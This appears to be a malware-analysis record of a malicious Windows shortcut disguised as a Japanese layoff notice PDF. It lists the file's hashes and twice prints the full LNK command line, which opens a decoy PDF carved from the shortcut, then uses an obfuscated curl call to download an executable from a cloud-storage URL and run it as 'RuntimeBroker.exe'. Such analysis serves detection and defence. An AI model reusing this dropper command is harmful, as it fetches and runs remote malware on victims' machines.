| Hash | Hash Value |
|---|---|
| MD5 | 585da0337e9d9a9c1d5bf097bdf8c1f1 |
| Sha1 | 16643b92b6012fd58f6c8fa38741435e7c6fe43c |
| Sha256 | 80b875df61fac83d0ff878b6dce5ce67db88c397522e6f6a7ccae5bf882eef0d |
| Sha384 | 27cb5f000543fdac5866798e26197f5a10eaed956fbedf737ba9608a3954080b889ca8165de466f1ed2aadaaba6d69c1 |
| Sha512 | 5ba0e05502681db9f1bf95833e88b9b366dc328cec03b9513325772924d059e0023c472a838f23dcf6e5fd4459d7a3f56c34556bf98d6678cfa4785356c7a548 |
| SSDeep | 3072:xJIYJ7JESQJyEAlShBoeDnCVfJUoCBFc4prz1MaZ2Z1Frfh+3pVMwmw:xuUJESjEO6Boej2f7CCQopszMwmw |
| TLSH | 8A0423DA50D1CAB4C1A1B92A0C3A4F95BA52F70D05C2DEFF31B42D52E2CABD505FB189 |

| Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe |

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe Malicious |
585da0337e9d9a9c1d5bf097bdf8c1f1 > リストラ通知書.pdf.lnk |